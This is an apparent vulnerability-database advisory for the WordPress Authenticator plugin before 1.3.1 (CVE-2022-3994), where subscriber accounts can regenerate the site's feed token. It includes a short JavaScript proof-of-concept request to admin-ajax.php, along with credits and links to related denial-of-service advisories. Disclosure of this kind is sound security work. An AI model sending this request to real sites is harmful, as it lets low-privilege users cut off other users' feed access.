WordPress Plugin Vulnerabilities

Authenticator < 1.3.1 - Subscriber+ Denial of Service via Feed Token Disclosure

Description

The plugin does not prevent subscribers from updating a site's feed access token, which may deny other users access to the functionality in certain configurations.

Proof of Concept

fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=regenerate_token&nonce='+authenticatorUI.nonce
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

Plugin icon
authenticator
Fixed in 1.3.1

References

CVE
CVE-2022-3994

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified
Yes
WPVDB ID
802a2139-ab48-4281-888f-225e6e3134aa

Timeline

Publicly Published
2022-12-09 (about 1 years ago)
Added
2022-12-09 (about 1 years ago)
Last Updated
2022-12-09 (about 1 years ago)

Other

Published
Title
Published
2024-02-08
Title
Backuply - Backup, Restore, Migrate and Clone < 1.2.6 - Unauthenticated Denial of Service
Published
2022-07-11
Title
GiveWP < 2.21.3 - DoS via CSRF
Published
2018-02-05
Title
WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
Published
2024-01-12
Title
Quiz Maker < 6.5.0.6 - Denial of Service
Published
2021-12-06
Title
Stars Rating < 3.5.1 - Comments Denial of Service